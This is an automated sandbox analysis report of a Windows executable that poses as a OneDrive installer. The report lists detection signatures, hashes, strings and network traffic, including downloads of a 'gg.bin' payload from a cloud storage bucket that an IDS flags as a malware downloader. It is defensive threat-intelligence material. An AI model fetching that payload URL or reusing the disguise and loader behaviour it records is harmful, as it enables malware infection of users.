Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
yJLckVp9HE.exe

Overview

General Information

Sample name:yJLckVp9HE.exe
renamed because original name is a hash value
Original sample name:c1a1f806fd88d08167ae9556c1977c01fa9d83a90dcf37718fe15563471b2945.exe
Analysis ID:1636026
MD5:7285b39e32a20337160514724e5d8be4
SHA1:c2063fa66f784e3ca1c2162a8db3425655cf8c78
SHA256:c1a1f806fd88d08167ae9556c1977c01fa9d83a90dcf37718fe15563471b2945
Tags:exeuser-JAMESWT_MHT
Infos:

Detection

Score:56
Range:0 - 100
Confidence:100%

Signatures

Detected unpacking (creates a PE file in dynamic memory)
Multi AV Scanner detection for submitted file
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Drops PE files
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • yJLckVp9HE.exe (PID: 7272 cmdline: "C:\Users\user\Desktop\yJLckVp9HE.exe" MD5: 7285B39E32A20337160514724E5D8BE4)
    • WerFault.exe (PID: 7968 cmdline: C:\Windows\system32\WerFault.exe -u -p 7272 -s 1240 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-03-12T10:22:30.452418+010028033043Unknown Traffic192.168.2.64968643.132.105.214443TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: yJLckVp9HE.exeReversingLabs: Detection: 13%
Source: yJLckVp9HE.exeVirustotal: Detection: 12%Perma Link
Source: yJLckVp9HE.exe, 00000000.00000002.1498280802.000001ECD84D0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_a8d0e1a2-a

Compliance

barindex
Source: C:\Users\user\Desktop\yJLckVp9HE.exeUnpacked PE file: 0.2.yJLckVp9HE.exe.140000000.2.unpack
Source: unknownHTTPS traffic detected: 43.132.105.214:443 -> 192.168.2.6:49686 version: TLS 1.2
Source: yJLckVp9HE.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: TEST_mi_exe_stub.pdb source: bin.exe.0.dr
Source: Binary string: Z:\Zemana\Projects\AMSDKCore\Driver\zam64.pdb source: yJLckVp9HE.exe, 00000000.00000002.1498280802.000001ECD84D0000.00000040.00001000.00020000.00000000.sdmp, yJLckVp9HE.exe, 00000000.00000002.1497353209.0000000140000000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: F:\dbs\sh\odct\0201_092045\client\onedrive\Setup\standalone\exe\obj\amd64\OneDriveSetup.pdb source: yJLckVp9HE.exe
Source: Binary string: C:\Users\Administrator\Desktop\KinndigitDll\x64\Release\KinndigitDll.pdb source: yJLckVp9HE.exe, 00000000.00000002.1498280802.000001ECD84D0000.00000040.00001000.00020000.00000000.sdmp, yJLckVp9HE.exe, 00000000.00000002.1497353209.0000000140000000.00000040.00001000.00020000.00000000.sdmp
Source: global trafficHTTP traffic detected: GET /gg.bin HTTP/1.1Host: oiuecvb-1341436096.cos.ap-hongkong.myqcloud.comCache-Control: no-cache
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:49686 -> 43.132.105.214:443
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.baidu.comAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /gg.bin HTTP/1.1Host: oiuecvb-1341436096.cos.ap-hongkong.myqcloud.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.baidu.comAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Source: global trafficDNS traffic detected: DNS query: oiuecvb-1341436096.cos.ap-hongkong.myqcloud.com
Source: global trafficDNS traffic detected: DNS query: www.baidu.com
Source: yJLckVp9HE.exe, 00000000.00000003.1372954965.000001ECD8E8C000.00000004.00000020.00020000.00000000.sdmp, bin.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: bin.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: yJLckVp9HE.exe, 00000000.00000003.1372954965.000001ECD8E8C000.00000004.00000020.00020000.00000000.sdmp, bin.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: yJLckVp9HE.exe, 00000000.00000003.1372954965.000001ECD8E8C000.00000004.00000020.00020000.00000000.sdmp, bin.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: yJLckVp9HE.exe, 00000000.00000002.1498280802.000001ECD84D0000.00000040.00001000.00020000.00000000.sdmp, yJLckVp9HE.exe, 00000000.00000002.1497353209.0000000140000000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
Source: yJLckVp9HE.exe, 00000000.00000002.1498280802.000001ECD84D0000.00000040.00001000.00020000.00000000.sdmp, yJLckVp9HE.exe, 00000000.00000002.1497353209.0000000140000000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
Source: yJLckVp9HE.exe, 00000000.00000002.1498280802.000001ECD84D0000.00000040.00001000.00020000.00000000.sdmp, yJLckVp9HE.exe, 00000000.00000002.1497353209.0000000140000000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: yJLckVp9HE.exe, 00000000.00000002.1498280802.000001ECD84D0000.00000040.00001000.00020000.00000000.sdmp, yJLckVp9HE.exe, 00000000.00000002.1497353209.0000000140000000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root.crl0G
Source: yJLckVp9HE.exe, 00000000.00000003.1372954965.000001ECD8E8C000.00000004.00000020.00020000.00000000.sdmp, bin.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: bin.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: yJLckVp9HE.exe, 00000000.00000003.1372954965.000001ECD8E8C000.00000004.00000020.00020000.00000000.sdmp, bin.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: bin.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: bin.exe.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: bin.exe.0.drString found in binary or memory: http://ocsp.digicert.com0
Source: yJLckVp9HE.exe, 00000000.00000003.1372954965.000001ECD8E8C000.00000004.00000020.00020000.00000000.sdmp, bin.exe.0.drString found in binary or memory: http://ocsp.digicert.com0A
Source: yJLckVp9HE.exe, 00000000.00000003.1372954965.000001ECD8E8C000.00000004.00000020.00020000.00000000.sdmp, bin.exe.0.drString found in binary or memory: http://ocsp.digicert.com0C
Source: yJLckVp9HE.exe, 00000000.00000003.1372954965.000001ECD8E8C000.00000004.00000020.00020000.00000000.sdmp, bin.exe.0.drString found in binary or memory: http://ocsp.digicert.com0X
Source: yJLckVp9HE.exe, 00000000.00000002.1498280802.000001ECD84D0000.00000040.00001000.00020000.00000000.sdmp, yJLckVp9HE.exe, 00000000.00000002.1497353209.0000000140000000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
Source: yJLckVp9HE.exe, 00000000.00000002.1498280802.000001ECD84D0000.00000040.00001000.00020000.00000000.sdmp, yJLckVp9HE.exe, 00000000.00000002.1497353209.0000000140000000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
Source: yJLckVp9HE.exe, 00000000.00000002.1498280802.000001ECD84D0000.00000040.00001000.00020000.00000000.sdmp, yJLckVp9HE.exe, 00000000.00000002.1497353209.0000000140000000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/rootr103
Source: yJLckVp9HE.exe, 00000000.00000002.1498280802.000001ECD84D0000.00000040.00001000.00020000.00000000.sdmp, yJLckVp9HE.exe, 00000000.00000002.1497353209.0000000140000000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/rootr30;
Source: yJLckVp9HE.exe, 00000000.00000002.1498208964.000001ECD8412000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pss.bdstatic.com/r/www/cache/static/global/img/pc_direct_42d6311.png)
Source: yJLckVp9HE.exe, 00000000.00000002.1498280802.000001ECD84D0000.00000040.00001000.00020000.00000000.sdmp, yJLckVp9HE.exe, 00000000.00000002.1497353209.0000000140000000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: yJLckVp9HE.exe, 00000000.00000002.1498280802.000001ECD84D0000.00000040.00001000.00020000.00000000.sdmp, yJLckVp9HE.exe, 00000000.00000002.1497353209.0000000140000000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://s.symcd.com06
Source: yJLckVp9HE.exe, 00000000.00000002.1498280802.000001ECD84D0000.00000040.00001000.00020000.00000000.sdmp, yJLckVp9HE.exe, 00000000.00000002.1497353209.0000000140000000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
Source: yJLckVp9HE.exe, 00000000.00000002.1498280802.000001ECD84D0000.00000040.00001000.00020000.00000000.sdmp, yJLckVp9HE.exe, 00000000.00000002.1497353209.0000000140000000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
Source: yJLckVp9HE.exe, 00000000.00000002.1498280802.000001ECD84D0000.00000040.00001000.00020000.00000000.sdmp, yJLckVp9HE.exe, 00000000.00000002.1497353209.0000000140000000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
Source: yJLckVp9HE.exe, 00000000.00000002.1498280802.000001ECD84D0000.00000040.00001000.00020000.00000000.sdmp, yJLckVp9HE.exe, 00000000.00000002.1497353209.0000000140000000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: yJLckVp9HE.exe, 00000000.00000002.1498280802.000001ECD84D0000.00000040.00001000.00020000.00000000.sdmp, yJLckVp9HE.exe, 00000000.00000002.1497353209.0000000140000000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: yJLckVp9HE.exe, 00000000.00000002.1498280802.000001ECD84D0000.00000040.00001000.00020000.00000000.sdmp, yJLckVp9HE.exe, 00000000.00000002.1497353209.0000000140000000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: Amcache.hve.9.drString found in binary or memory: http://upx.sf.net
Source: yJLckVp9HE.exe, 00000000.00000002.1498280802.000001ECD84D0000.00000040.00001000.00020000.00000000.sdmp, yJLckVp9HE.exe, 00000000.00000002.1497353209.0000000140000000.00000040.00001000.00020000.00000000.sdmp, yJLckVp9HE.exe, 00000000.00000002.1498111901.000001ECD66E3000.00000004.00000020.00020000.00000000.sdmp, yJLckVp9HE.exe, 00000000.00000002.1498014858.000001ECD6646000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.baidu.com/
Source: yJLckVp9HE.exe, 00000000.00000002.1498014858.000001ECD6646000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.baidu.com/4
Source: yJLckVp9HE.exe, 00000000.00000002.1498280802.000001ECD84D0000.00000040.00001000.00020000.00000000.sdmp, yJLckVp9HE.exe, 00000000.00000002.1497353209.0000000140000000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.baidu.com/Date:
Source: bin.exe.0.drString found in binary or memory: http://www.digicert.com/CPS0
Source: yJLckVp9HE.exe, 00000000.00000002.1498111901.000001ECD6677000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients.config.gcc.office.net/odb/v1.0/synchealth$Ow
Source: yJLckVp9HE.exeString found in binary or memory: https://clients.config.gcc.office.net/odb/v1.0/synchealthUpdateRingSettingsManager::TryUpdateF:
Source: yJLckVp9HE.exe, 00000000.00000002.1498111901.000001ECD6677000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients.config.office.net/collector/v1.0/inventoryodb
Source: yJLckVp9HE.exeString found in binary or memory: https://clients.config.office.net/collector/v1.0/inventoryodb0.010.03ar;bg;ca;cs;da;de;el;en;en-GB;e
Source: yJLckVp9HE.exe, 00000000.00000002.1498111901.000001ECD6677000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: yJLckVp9HE.exeString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey25.016393=%I.%M
Source: yJLckVp9HE.exe, 00000000.00000002.1498280802.000001ECD84D0000.00000040.00001000.00020000.00000000.sdmp, yJLckVp9HE.exe, 00000000.00000002.1497353209.0000000140000000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
Source: yJLckVp9HE.exe, 00000000.00000002.1498280802.000001ECD84D0000.00000040.00001000.00020000.00000000.sdmp, yJLckVp9HE.exe, 00000000.00000002.1497353209.0000000140000000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
Source: yJLckVp9HE.exe, 00000000.00000002.1498280802.000001ECD84D0000.00000040.00001000.00020000.00000000.sdmp, yJLckVp9HE.exe, 00000000.00000002.1497353209.0000000140000000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
Source: yJLckVp9HE.exe, 00000000.00000002.1498280802.000001ECD84D0000.00000040.00001000.00020000.00000000.sdmp, yJLckVp9HE.exe, 00000000.00000002.1497353209.0000000140000000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
Source: yJLckVp9HE.exe, 00000000.00000002.1498280802.000001ECD84D0000.00000040.00001000.00020000.00000000.sdmp, yJLckVp9HE.exe, 00000000.00000002.1497353209.0000000140000000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
Source: yJLckVp9HE.exe, 00000000.00000002.1498280802.000001ECD84D0000.00000040.00001000.00020000.00000000.sdmp, yJLckVp9HE.exe, 00000000.00000002.1497353209.0000000140000000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0.
Source: yJLckVp9HE.exeString found in binary or memory: https://dc.services.visualstudio.com/v2/track
Source: yJLckVp9HE.exeString found in binary or memory: https://dc.services.visualstudio.com/v2/track8N
Source: yJLckVp9HE.exe, 00000000.00000000.1259051673.00007FF6E822C000.00000002.00000001.01000000.00000003.sdmp, yJLckVp9HE.exe, 00000000.00000002.1499103066.00007FF6E822C000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://dc.services.visualstudio.com/v2/track8N.
Source: yJLckVp9HE.exe, 00000000.00000002.1498111901.000001ECD6677000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/EnterpriseV2I
Source: yJLckVp9HE.exeString found in binary or memory: https://g.live.com/odclientsettings/EnterpriseV2https://g.live.com/odclientsettings/MsitFastV2https:
Source: yJLckVp9HE.exe, 00000000.00000002.1498111901.000001ECD6677000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/InsidersV2C
Source: yJLckVp9HE.exe, 00000000.00000002.1498014858.000001ECD6618000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/MsitFastV2
Source: yJLckVp9HE.exe, 00000000.00000002.1498014858.000001ECD6618000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/MsitSlowV2
Source: yJLckVp9HE.exe, 00000000.00000002.1498111901.000001ECD6677000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2n
Source: yJLckVp9HE.exe, 00000000.00000002.1498111901.000001ECD6677000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://oiuecvb-1341436096.cos.ap-hongkong.myqcloud.com/
Source: yJLckVp9HE.exe, 00000000.00000002.1498111901.000001ECD66C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://oiuecvb-1341436096.cos.ap-hongkong.myqcloud.com/gg.bin
Source: yJLckVp9HE.exe, 00000000.00000002.1498111901.000001ECD6677000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://oiuecvb-1341436096.cos.ap-hongkong.myqcloud.com/gg.binY
Source: yJLckVp9HE.exe, 00000000.00000002.1498111901.000001ECD6677000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://oiuecvb-1341436096.cos.ap-hongkong.myqcloud.com/gg.binl
Source: yJLckVp9HE.exe, 00000000.00000002.1498208964.000001ECD8412000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pss.bdstatic.com/r/www/static/font/cosmic/pc/cos-icon_8bae49a.css
Source: yJLckVp9HE.exe, 00000000.00000002.1498208964.000001ECD8412000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://psstatic.cdn.bcebos.com/video/wiseindex/aa6eef91f8b5b1a33b454c401_1660835115000.png
Source: yJLckVp9HE.exe, 00000000.00000002.1498208964.000001ECD8412000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.baidu.com/favicon.ico
Source: yJLckVp9HE.exe, 00000000.00000002.1498280802.000001ECD84D0000.00000040.00001000.00020000.00000000.sdmp, yJLckVp9HE.exe, 00000000.00000002.1497353209.0000000140000000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49686
Source: unknownNetwork traffic detected: HTTP traffic on port 49686 -> 443
Source: unknownHTTPS traffic detected: 43.132.105.214:443 -> 192.168.2.6:49686 version: TLS 1.2
Source: C:\Users\user\Desktop\yJLckVp9HE.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7272 -s 1240
Source: yJLckVp9HE.exeStatic PE information: Resource name: PAYLOAD type: Microsoft Cabinet archive data, many, 78359548 bytes, 1024 files, at 0x44 +A "adal.dll" +A "alertIcon.png", flags 0x4, number 1, extra bytes 20 in head, 9812 datablocks, 0x1503 compression
Source: yJLckVp9HE.exe, 00000000.00000002.1498280802.000001ECD84D0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameZAM.exeD vs yJLckVp9HE.exe
Source: yJLckVp9HE.exe, 00000000.00000002.1497353209.0000000140000000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameZAM.exeD vs yJLckVp9HE.exe
Source: yJLckVp9HE.exe, 00000000.00000000.1259051673.00007FF6E822C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: TelemetryIdAuthenticationURLsAuthorityDiscoveryApiDiscoveryResourceIdGraphApiNextEmailHRDUpdateWebServiceUrlSilentBusinessConfigByDefaultRampSilentBusinessConfigCompletedClientEverSignedInPersonalUnlinkedTimeStampUnexpectedCrashCount\OneDrive.exeGlobal\SkyDrive Mutex {8EAEBBD8-2370-4716-9C12-1C4BA22A988C}Accounts/client=openEnableTeamTier_InternalAudienceDataSoftware\Microsoft\Office\ClickToRun\ConfigurationDogfood16.0.11425.20202MicrosoftInsiders::DevMainInsiders::CCUserLanguageenen-USEnablePreviewBuildsSOFTWARE\Microsoft\WindowsSelfHost\ApplicabilityNOT_SETRingRetailSoftware\Microsoft\OneDrive\AccountsIsGoSov596x86AMD64ARM64x64UnknownMSFTInternalSoftware\Policies\Microsoft\SQMClientSoftware\Microsoft\SQMClientIsTest*****VRR1TASCLT*|odsp35*|VNBP101*|*\Abby|*\moeuser|moeuser|*\drxaccount|drxaccount|*\TASClient|TASClient|PYXIDIS\pulsar|PYXIDIS\tank|LocalAdminUser|AdminUAC|*\cloudtest|cloudtest|NTDEV\ntlab00000000-0000-0000-0000-000000000000netapi32.dllNetGetAadJoinInformationNetFreeAadJoinInformationNetGetJoinInformationNetApiBufferFree1.2.840.113556.1.5.284.5S-1-3-2S-1-3-3S-1-5-8S-1-5-17S-1-5-18S-1-5-19S-1-5-20S-1-5-80Software\Microsoft\Windows NT\CurrentVersion\ProfileListProfileImagePathSoftware\Microsoft\Windows NT\CurrentVersion\ProfileList\NTUSER.DATAppData\Local\Microsoft\Windows\UsrClass.dat\NTUSER.DATAppsUseLightThemeOneNote.exeKilling Win32 OneNote process with process Id: Failed to terminate Win32 OneNote. Error: Failed to get handle to Win32 OneNote process. Process Id: /allusers/firstsetupOneDriveStandaloneUpdater.exeOneDriveUpdaterService.exe/updateSoftware\Microsoft\Windows\CurrentVersion\Uninstall\OneDriveSetup.exe\VarFileInfo\Translation\StringFileInfo\%04x%04x\OriginalFilenameSoftware\Policies\Microsoft\OneDriveUnexpectedCrashLastReportTime0Feb 1 2025 vs yJLckVp9HE.exe
Source: yJLckVp9HE.exe, 00000000.00000002.1499103066.00007FF6E822C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: TelemetryIdAuthenticationURLsAuthorityDiscoveryApiDiscoveryResourceIdGraphApiNextEmailHRDUpdateWebServiceUrlSilentBusinessConfigByDefaultRampSilentBusinessConfigCompletedClientEverSignedInPersonalUnlinkedTimeStampUnexpectedCrashCount\OneDrive.exeGlobal\SkyDrive Mutex {8EAEBBD8-2370-4716-9C12-1C4BA22A988C}Accounts/client=openEnableTeamTier_InternalAudienceDataSoftware\Microsoft\Office\ClickToRun\ConfigurationDogfood16.0.11425.20202MicrosoftInsiders::DevMainInsiders::CCUserLanguageenen-USEnablePreviewBuildsSOFTWARE\Microsoft\WindowsSelfHost\ApplicabilityNOT_SETRingRetailSoftware\Microsoft\OneDrive\AccountsIsGoSov596x86AMD64ARM64x64UnknownMSFTInternalSoftware\Policies\Microsoft\SQMClientSoftware\Microsoft\SQMClientIsTest*****VRR1TASCLT*|odsp35*|VNBP101*|*\Abby|*\moeuser|moeuser|*\drxaccount|drxaccount|*\TASClient|TASClient|PYXIDIS\pulsar|PYXIDIS\tank|LocalAdminUser|AdminUAC|*\cloudtest|cloudtest|NTDEV\ntlab00000000-0000-0000-0000-000000000000netapi32.dllNetGetAadJoinInformationNetFreeAadJoinInformationNetGetJoinInformationNetApiBufferFree1.2.840.113556.1.5.284.5S-1-3-2S-1-3-3S-1-5-8S-1-5-17S-1-5-18S-1-5-19S-1-5-20S-1-5-80Software\Microsoft\Windows NT\CurrentVersion\ProfileListProfileImagePathSoftware\Microsoft\Windows NT\CurrentVersion\ProfileList\NTUSER.DATAppData\Local\Microsoft\Windows\UsrClass.dat\NTUSER.DATAppsUseLightThemeOneNote.exeKilling Win32 OneNote process with process Id: Failed to terminate Win32 OneNote. Error: Failed to get handle to Win32 OneNote process. Process Id: /allusers/firstsetupOneDriveStandaloneUpdater.exeOneDriveUpdaterService.exe/updateSoftware\Microsoft\Windows\CurrentVersion\Uninstall\OneDriveSetup.exe\VarFileInfo\Translation\StringFileInfo\%04x%04x\OriginalFilenameSoftware\Policies\Microsoft\OneDriveUnexpectedCrashLastReportTime0Feb 1 2025 vs yJLckVp9HE.exe
Source: yJLckVp9HE.exeBinary or memory string: TelemetryIdAuthenticationURLsAuthorityDiscoveryApiDiscoveryResourceIdGraphApiNextEmailHRDUpdateWebServiceUrlSilentBusinessConfigByDefaultRampSilentBusinessConfigCompletedClientEverSignedInPersonalUnlinkedTimeStampUnexpectedCrashCount\OneDrive.exeGlobal\SkyDrive Mutex {8EAEBBD8-2370-4716-9C12-1C4BA22A988C}Accounts/client=openEnableTeamTier_InternalAudienceDataSoftware\Microsoft\Office\ClickToRun\ConfigurationDogfood16.0.11425.20202MicrosoftInsiders::DevMainInsiders::CCUserLanguageenen-USEnablePreviewBuildsSOFTWARE\Microsoft\WindowsSelfHost\ApplicabilityNOT_SETRingRetailSoftware\Microsoft\OneDrive\AccountsIsGoSov596x86AMD64ARM64x64UnknownMSFTInternalSoftware\Policies\Microsoft\SQMClientSoftware\Microsoft\SQMClientIsTest*****VRR1TASCLT*|odsp35*|VNBP101*|*\Abby|*\moeuser|moeuser|*\drxaccount|drxaccount|*\TASClient|TASClient|PYXIDIS\pulsar|PYXIDIS\tank|LocalAdminUser|AdminUAC|*\cloudtest|cloudtest|NTDEV\ntlab00000000-0000-0000-0000-000000000000netapi32.dllNetGetAadJoinInformationNetFreeAadJoinInformationNetGetJoinInformationNetApiBufferFree1.2.840.113556.1.5.284.5S-1-3-2S-1-3-3S-1-5-8S-1-5-17S-1-5-18S-1-5-19S-1-5-20S-1-5-80Software\Microsoft\Windows NT\CurrentVersion\ProfileListProfileImagePathSoftware\Microsoft\Windows NT\CurrentVersion\ProfileList\NTUSER.DATAppData\Local\Microsoft\Windows\UsrClass.dat\NTUSER.DATAppsUseLightThemeOneNote.exeKilling Win32 OneNote process with process Id: Failed to terminate Win32 OneNote. Error: Failed to get handle to Win32 OneNote process. Process Id: /allusers/firstsetupOneDriveStandaloneUpdater.exeOneDriveUpdaterService.exe/updateSoftware\Microsoft\Windows\CurrentVersion\Uninstall\OneDriveSetup.exe\VarFileInfo\Translation\StringFileInfo\%04x%04x\OriginalFilenameSoftware\Policies\Microsoft\OneDriveUnexpectedCrashLastReportTime0Feb 1 2025 vs yJLckVp9HE.exe
Source: classification engineClassification label: mal56.evad.winEXE@2/10@2/3
Source: C:\Users\user\Desktop\yJLckVp9HE.exeFile created: C:\Users\Public\Downloads\20250312042223\Jump to behavior
Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7272
Source: C:\Windows\System32\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\c9afb08a-d41c-4cfb-889e-636cbb50f4d7Jump to behavior
Source: yJLckVp9HE.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\yJLckVp9HE.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: yJLckVp9HE.exe, 00000000.00000002.1499291082.00007FF6E8344000.00000008.00000001.01000000.00000003.sdmp, yJLckVp9HE.exe, 00000000.00000000.1259164947.00007FF6E8343000.00000008.00000001.01000000.00000003.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: yJLckVp9HE.exe, 00000000.00000002.1499291082.00007FF6E8344000.00000008.00000001.01000000.00000003.sdmp, yJLckVp9HE.exe, 00000000.00000000.1259164947.00007FF6E8343000.00000008.00000001.01000000.00000003.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: yJLckVp9HE.exe, 00000000.00000002.1499291082.00007FF6E8344000.00000008.00000001.01000000.00000003.sdmp, yJLckVp9HE.exe, 00000000.00000000.1259164947.00007FF6E8343000.00000008.00000001.01000000.00000003.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: yJLckVp9HE.exe, 00000000.00000002.1499291082.00007FF6E8344000.00000008.00000001.01000000.00000003.sdmp, yJLckVp9HE.exe, 00000000.00000000.1259164947.00007FF6E8343000.00000008.00000001.01000000.00000003.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: yJLckVp9HE.exeReversingLabs: Detection: 13%
Source: yJLckVp9HE.exeVirustotal: Detection: 12%
